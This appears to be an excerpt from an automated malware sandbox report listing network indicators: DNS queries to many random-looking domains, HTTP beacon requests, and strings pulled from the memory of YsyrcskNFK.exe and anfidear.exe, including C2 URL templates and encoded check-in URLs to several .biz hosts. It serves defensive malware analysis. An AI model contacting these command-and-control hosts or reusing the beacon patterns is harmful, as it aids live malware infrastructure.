Source: global trafficHTTP traffic detected: GET /d/N?02B20A4AABB20A4AAB800A66ABB20A68F7A6EE8039B20A7C8580247399823A64AB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F89C5C9AF89C5C9ACA9C709AF89C7EC6EC789608F89C6AB4CAB265A8C8AC729A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficDNS traffic detected: DNS query: uszzu.kr
Source: global trafficDNS traffic detected: DNS query: gcwsiuav.st
Source: global trafficDNS traffic detected: DNS query: oiyjuwpfrwm.cg
Source: global trafficDNS traffic detected: DNS query: iycisbygfyc.tk
Source: global trafficDNS traffic detected: DNS query: qidxlsmgykakg.cg
Source: global trafficDNS traffic detected: DNS query: aooxybqcnmauq.vg
Source: global trafficDNS traffic detected: DNS query: utbidet-ugeas.biz
Source: global trafficDNS traffic detected: DNS query: jmkxaicazxych.rw
Source: global trafficDNS traffic detected: DNS query: mcawgzcua.mp
Source: global trafficDNS traffic detected: DNS query: yejcjzwctwukz.ph
Source: global trafficDNS traffic detected: DNS query: usgghqqwe.nu
Source: global trafficDNS traffic detected: DNS query: cgpnsdg.mp
Source: global trafficDNS traffic detected: DNS query: yjzdwbmrwqqceb.st
Source: global trafficDNS traffic detected: DNS query: hrgovxgunqipw.ph
Source: global trafficDNS traffic detected: DNS query: azygvwdgtdv.st
Source: global trafficDNS traffic detected: DNS query: feiqcfkbsuoje.ph
Source: global trafficDNS traffic detected: DNS query: icuryqispglav.nu
Source: global trafficDNS traffic detected: DNS query: veymtqimby.nu
Source: global trafficDNS traffic detected: DNS query: vhpidswja.nu
Source: global trafficDNS traffic detected: DNS query: bvqeqascgtwoe.mp
Source: global trafficDNS traffic detected: DNS query: pocsr.mp
Source: global trafficDNS traffic detected: DNS query: egqafiwiaqocq.vg
Source: global trafficDNS traffic detected: DNS query: viiaotleq.ws
Source: global trafficDNS traffic detected: DNS query: fuokzkoyn.st
Source: global trafficDNS traffic detected: DNS query: uswgaew.mp
Source: global trafficDNS traffic detected: DNS query: yqymasgdwtbek.st
Source: global trafficDNS traffic detected: DNS query: uicuzgeyypz.vg
Source: global trafficDNS traffic detected: DNS query: yqnirusysaj.kr
Source: global trafficDNS traffic detected: DNS query: tebscyiqw.cm
Source: global trafficDNS traffic detected: DNS query: uzygawe.nu
Source: global trafficDNS traffic detected: DNS query: uciaytygm.nu
Source: global trafficDNS traffic detected: DNS query: woukmmo.mp
Source: global trafficDNS traffic detected: DNS query: rwmjwroq.ph
Source: global trafficDNS traffic detected: DNS query: qteqgagae.rw
Source: global trafficDNS traffic detected: DNS query: mkxsdgyrsnuny.ph
Source: global trafficDNS traffic detected: DNS query: xcsyc.cg
Source: global trafficDNS traffic detected: DNS query: uilghhpmueun.cm
Source: global trafficDNS traffic detected: DNS query: sgquyqg.ws
Source: global trafficDNS traffic detected: DNS query: qkysyuydwqu.mp
Source: global trafficDNS traffic detected: DNS query: wbisbwimhhhup.mp
Source: global trafficDNS traffic detected: DNS query: ubyjmuise.kr
Source: global trafficDNS traffic detected: DNS query: itomvwhp.kr
Source: global trafficDNS traffic detected: DNS query: qgiikzk.ws
Source: global trafficDNS traffic detected: DNS query: zsuli.st
Source: global trafficDNS traffic detected: DNS query: iaxnaf.ph
Source: global trafficDNS traffic detected: DNS query: uzekiyy.st
Source: global trafficDNS traffic detected: DNS query: miezkifgq.ws
Source: global trafficDNS traffic detected: DNS query: aakqag.nu
Source: global trafficDNS traffic detected: DNS query: wdekkqy.ph
Source: global trafficDNS traffic detected: DNS query: yvuqgqtpuia.st
Source: global trafficDNS traffic detected: DNS query: cunyqsqr.nu
Source: global trafficDNS traffic detected: DNS query: ivsxiq.tk
Source: global trafficDNS traffic detected: DNS query: mmkcusipflmcq.cm
Source: global trafficDNS traffic detected: DNS query: oooeuui.st
Source: global trafficDNS traffic detected: DNS query: cwajuaswd.cm
Source: global trafficDNS traffic detected: DNS query: rrksi.mp
Source: global trafficDNS traffic detected: DNS query: ioauwacqnunkfe.ws
Source: global trafficDNS traffic detected: DNS query: mkakmwtu.ph
Source: global trafficDNS traffic detected: DNS query: cewaq.nu
Source: global trafficDNS traffic detected: DNS query: bwenqrwgiaihf.vg
Source: global trafficDNS traffic detected: DNS query: haenyxj.nu
Source: global trafficDNS traffic detected: DNS query: gqesbimbmu.ws
Source: global trafficDNS traffic detected: DNS query: wakmcawmo.mp
Source: global trafficDNS traffic detected: DNS query: ajyswracs.rw
Source: global trafficDNS traffic detected: DNS query: ccecvpu.st
Source: global trafficDNS traffic detected: DNS query: iisiamiqchpkf.nu
Source: global trafficDNS traffic detected: DNS query: siosbpgeiahyu.kr
Source: global trafficDNS traffic detected: DNS query: eaiulccm.cm
Source: global trafficDNS traffic detected: DNS query: mfxspmq.nu
Source: global trafficDNS traffic detected: DNS query: umauopcgfqq.rw
Source: global trafficDNS traffic detected: DNS query: yaawpiaquwk.cm
Source: global trafficDNS traffic detected: DNS query: akgggynwmtrgwh.ph
Source: global trafficDNS traffic detected: DNS query: wczmvvs.mp
Source: global trafficDNS traffic detected: DNS query: zmpvcez.cm
Source: global trafficDNS traffic detected: DNS query: qcoszo.ph
Source: global trafficDNS traffic detected: DNS query: excicmezoskdep.tk
Source: global trafficDNS traffic detected: DNS query: khiowcxqg.vg
Source: global trafficDNS traffic detected: DNS query: oqwktwc.cm
Source: global trafficDNS traffic detected: DNS query: cdcueqtmjixig.vg
Source: global trafficDNS traffic detected: DNS query: ncjwytiai.rw
Source: global trafficDNS traffic detected: DNS query: fdcjgqsraedu.cg
Source: global trafficDNS traffic detected: DNS query: wwjfjwkbe.rw
Source: global trafficDNS traffic detected: DNS query: creqwgcal.ws
Source: global trafficDNS traffic detected: DNS query: gowravdyagf.tk
Source: global trafficDNS traffic detected: DNS query: goowamy.cm
Source: global trafficDNS traffic detected: DNS query: qywresbs.mp
Source: global trafficDNS traffic detected: DNS query: gfrcjlice.mp
Source: global trafficDNS traffic detected: DNS query: kzagkogkm.st
Source: global trafficDNS traffic detected: DNS query: mjlgadcmryrzm.vg
Source: global trafficDNS traffic detected: DNS query: wolemymal.ph
Source: global trafficDNS traffic detected: DNS query: ywmykx.tk
Source: global trafficDNS traffic detected: DNS query: uwqsqkc.rw
Source: global trafficDNS traffic detected: DNS query: lgyczssqg.vg
Source: global trafficDNS traffic detected: DNS query: dmkxrdukmfmesx.mp
Source: global trafficDNS traffic detected: DNS query: gguqivslu.ws
Source: global trafficDNS traffic detected: DNS query: suqjayddo.st
Source: global trafficDNS traffic detected: DNS query: wuaizix.ws
Source: global trafficDNS traffic detected: DNS query: sucqey.tk
Source: global trafficDNS traffic detected: DNS query: phxszkaqnas.ws
Source: global trafficDNS traffic detected: DNS query: misooios.ws
Source: YsyrcskNFK.exe, YsyrcskNFK.exe, 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmp, anfidear.exe, anfidear.exe, 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/G?
Source: YsyrcskNFK.exe, YsyrcskNFK.exe, 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmp, anfidear.exe, anfidear.exe, 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/N?
Source: YsyrcskNFK.exe, 00000000.00000002.2318503177.0000000000407000.00000004.00000001.01000000.00000003.sdmp, anfidear.exe, 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%s
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02083C1BF1083C1BF13A3C37F1083C39AD1CD8D163083C2DDF3A1222C3380C35F1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0208BF147708BF14773ABF387708BF362B1C5BDEE508BF22593A912D45388F3A77
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0208E4279808E427983AE40B9808E405C41C00ED0A08E411B63ACA1EAA38D40998
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?020C5067260C5067263E504B260C50457A18B4ADB40C5051083E7E5E143C604926
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?020C7846AF0C7846AF3E786AAF0C7864F3189C8C3D0C7870813E567F9D3C4868AF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?020F7DFF370F7DFF373D7DD3370F7DDD6B1B9935A50F7DC9193D53C6053F4DD137
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?022200EEDE2200EEDE1000C2DE2200CC8236E4244C2200D8F0102ED7EC1230C0DE
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02240F4375240F4375160F6F75240F612930EB89E7240F755B16217A47143F6D75
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0224F5EE5624F5EE5616F5C25624F5CC0A301124C424F5D87816DBD76414C5C056
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?022C70E7482C70E7481E70CB482C70C51438942DDA2C70D1661E5EDE7A1C40C948
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?022EA0DA732EA0DA731CA0F6732EA0F82F3A4410E12EA0EC5D1C8EE3411E90F473
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?022EC4AF722EC4AF721CC483722EC48D2E3A2065E02EC4995C1CEA96401EF48172
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02344E27F3344E27F3064E0BF3344E05AF20AAED61344E11DD06601EC1047E09F3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?023803BD853803BD850A03918538039FD92CE7771738038BAB0A2D84B708339385
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?023867E9C03867E9C00A67C5C03867CB9C2C8323523867DFEE0A49D0F20857C7C0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?024497CF864497CF867697E3864497EDDA507305144497F9A876B9F6B474A7E186
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0246E9704A46E9704A74E95C4A46E95216520DBAD846E9466474C7497876D95E4A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02501DD36E501DD36E621DFF6E501DF13244F919FC501DE5406233EA5C602DFD6E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0259AB44D259AB44D26BAB68D259AB668E4D4F8E4059AB72FC6B857DE0699B6AD2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?025A3D8B5B5A3D8B5B683DA75B5A3DA9074ED941C95A3DBD756813B2696A0DA55B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?025ACA66835ACA668368CA4A835ACA44DF4E2EAC115ACA50AD68E45FB16AFA4883
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0260DC1F2F60DC1F2F52DC332F60DC3D737438D5BD60DC290152F2261D50EC312F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0279895CEF79895CEF4B8970EF79897EB36D6D967D79896AC14BA765DD49B972EF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?027A8C20B27A8C20B2488C0CB27A8C02EE6E68EA207A8C169C48A219804ABC0EB2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?027AB2E3487AB2E34848B2CF487AB2C1146E5629DA7AB2D566489CDA7A4A82CD48
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?027AECC80B7AECC80B48ECE40B7AECEA576E0802997AECFE2548C2F1394ADCE60B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0287934A7287934A72B59366728793682E937780E087937C5CB5BD7340B7A36472
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0288D7D87388D7D873BAD7F47388D7FA2F9C3312E188D7EE5DBAF9E141B8E7F673
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?028C1E3A398C1E3A39BE1E16398C1E186598FAF0AB8C1E0C17BE30030BBC2E1439
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?028C24C4388C24C438BE24E8388C24E66498C00EAA8C24F216BE0AFD0ABC14EA38
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0296D2268996D22689A4D20A8996D204D58236EC1B96D210A7A4FC1FBBA6E20889
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0298A2BA3398A2BA33AAA2963398A2986F8C4670A198A28C1DAA8C8301A8929433
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?0298B16A3798B16A37AAB1463798B1486B8C55A0A598B15C19AA9F5305A8814437
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02AA2927E4AA2927E498290BE4AA2905B8BECDED76AA2911CA98071ED69A1909E4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02B1FC10ADB1FC10AD83FC3CADB1FC32F1A518DA3FB1FC268383D2299F81CC3EAD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02B8236B98B8236B988A234798B82349C4ACC7A10AB8235DB68A0D52AA88134598
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02C285B130C285B130F0859D30C285936CD6617BA2C285871EF0AB8802F2B59F30
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02C39C263DC39C263DF19C0A3DC39C0461D778ECAFC39C1013F1B21F0FF3AC083D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02C42E319FC42E319FF62E1D9FC42E13C3D0CAFB0DC42E07B1F60008ADF41E1F9F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02C4A66A6AC4A66A6AF6A6466AC4A64836D042A0F8C4A65C44F6885358F496446A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02C688AF68C688AF68F4888368C6888D34D26C65FAC6889946F4A6965AF6B88168
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02CD9A7119CD9A7119FF9A5D19CD9A5345D97EBB8BCD9A4737FFB4482BFDAA5F19
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02D0FF33C8D0FF33C8E2FF1FC8D0FF1194C41BF95AD0FF05E6E2D10AFAE0CF1DC8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02EC836F29EC836F29DE834329EC834D75F867A5BBEC835907DEAD561BDCB34129
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F048A5DCF048A5DCC24889DCF0488780E4AC6F4EF04893F2C2669CEEC0788BDC
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F4389205F4389205C638BE05F438B059E0DC5897F438A42BC616AB37C408BC05
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F624C286F624C286C424EE86F624E0DAE2C00814F624F4A8C40AFBB4C614EC86
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F625234BF625234BC4250F4BF6250117E2C1E9D9F6251565C40B1A79C6150D4B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F6E47C33F6E47C33C4E45033F6E45E6FE200B6A1F6E44A1DC4CA4501C6D45233
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F6F41002F6F41002C4F43C02F6F4325EE210DA90F6F4262CC4DA2930C6C43E02
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://argunoos.biz/d/N?02F85AEF27F85AEF27CA5AC327F85ACD7BECBE25B5F85AD909CA74D615C86AC127
Source: explorer.exe, 00000005.00000002.4781575407.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000005.00000002.4781575407.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000005.00000002.4781575407.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0204BF06E004BF06E036BF2AE004BF24BC105BCC7204BF30CE36913FD2348F28E0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?020651AA460651AA46345186460651881A12B560D406519C68347F937436618446
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?020686D95A0686D95A3486F55A0686FB06126213C80686EF7434A8E06836B6F75A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?020AAA05660AAA056638AA29660AAA273A1E4ECFF40AAA334838843C543A9A2B66
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?020F8B9E130F8B9E133D8BB2130F8BBC4F1B6F54810F8BA83D3DA5A7213FBBB013
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?020FAECEA10FAECEA13DAEE2A10FAEECFD1B4A04330FAEF88F3D80F7933F9EE0A1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02264C5283264C5283144C7E83264C70DF32A89811264C64AD14626BB1167C7C83
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0228C42DC328C42DC31AC401C328C40F9F3C20E75128C41BED1AEA14F118F403C3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?022E5C54B62E5C54B61C5C78B62E5C76EA3AB89E242E5C62981C726D841E6C7AB6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?022EF0BF772EF0BF771CF093772EF09D2B3A1475E52EF089591CDE86451EC09177
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02302160293021602902214C293021427524C5AABB30215607020F591B00114E29
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0234461A0B34461A0B0646360B3446385720A2D09934462C25066823390476340B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02386863C1386863C10A684FC13868419D2C8CA953386855EF0A465AF308584DC1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0238A2DE9F38A2DE9F0AA2F29F38A2FCC32C46140D38A2E8B10A8CE7AD0892F09F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?023F5830C33F5830C30D581CC33F58129F2BBCFA513F5806ED0D7609F10F681EC3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02468495DF468495DF7484B9DF4684B78352605F4D4684A3F174AAACED76B4BBDF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02499B4946499B49467B9B6546499B6B1A5D7F83D4499B7F687BB5707479AB6746
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025073DC255073DC256273F0255073FE79449716B75073EA0B625DE5176043F225
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0250F807FB50F807FB62F82BFB50F825A7441CCD6950F831D562D63EC960C829FB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025228995C5228995C6028B55C5228BB0046CC53CE5228AF726006A06E6218B75C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025257D9F95257D9F96057F5F95257FBA546B3136B5257EFD76079E0CB6267F7F9
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02528020485280204860800C48528002144664EADA5280166660AE197A62B00E48
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02562C55A5562C55A5642C79A5562C77F942C89F37562C638B64026C97661C7BA5
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025AF9B0D95AF9B0D968F99CD95AF992854E1D7A4B5AF986F768D789EB6AC99ED9
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025B61E8585B61E8586961C4585B61CA044F8522CA5B61DE76694FD16A6B51C658
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025BD048D85BD048D869D064D85BD06A844F34824A5BD07EF669FE71EA6BE066D8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?025C25E9115C25E9116E25C5115C25CB4D48C123835C25DF3F6E0BD0236C15C711
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0260679350606793505267BF506067B10C748359C26067A57E5249AA625057BD50
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0260FB6C7160FB6C7152FB407160FB4E2D741FA6E360FB5A5F52D5554350CB4271
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0264C76F5B64C76F5B56C7435B64C74D077023A5C964C7597556E9566954F7415B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02668629D6668629D6548605D666860B8A7262E34466861FF854A810E456B607D6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0279B36CF679B36CF64BB340F679B34EAA6D57A66479B35AD84B9D55C4498342F6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?027ABBE4DD7ABBE4DD48BBC8DD7ABBC6816E5F2E4F7ABBD2F34895DDEF4A8BCADD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?027E4667147E4667144C464B147E4645486AA2AD867E46513A4C685E264E764914
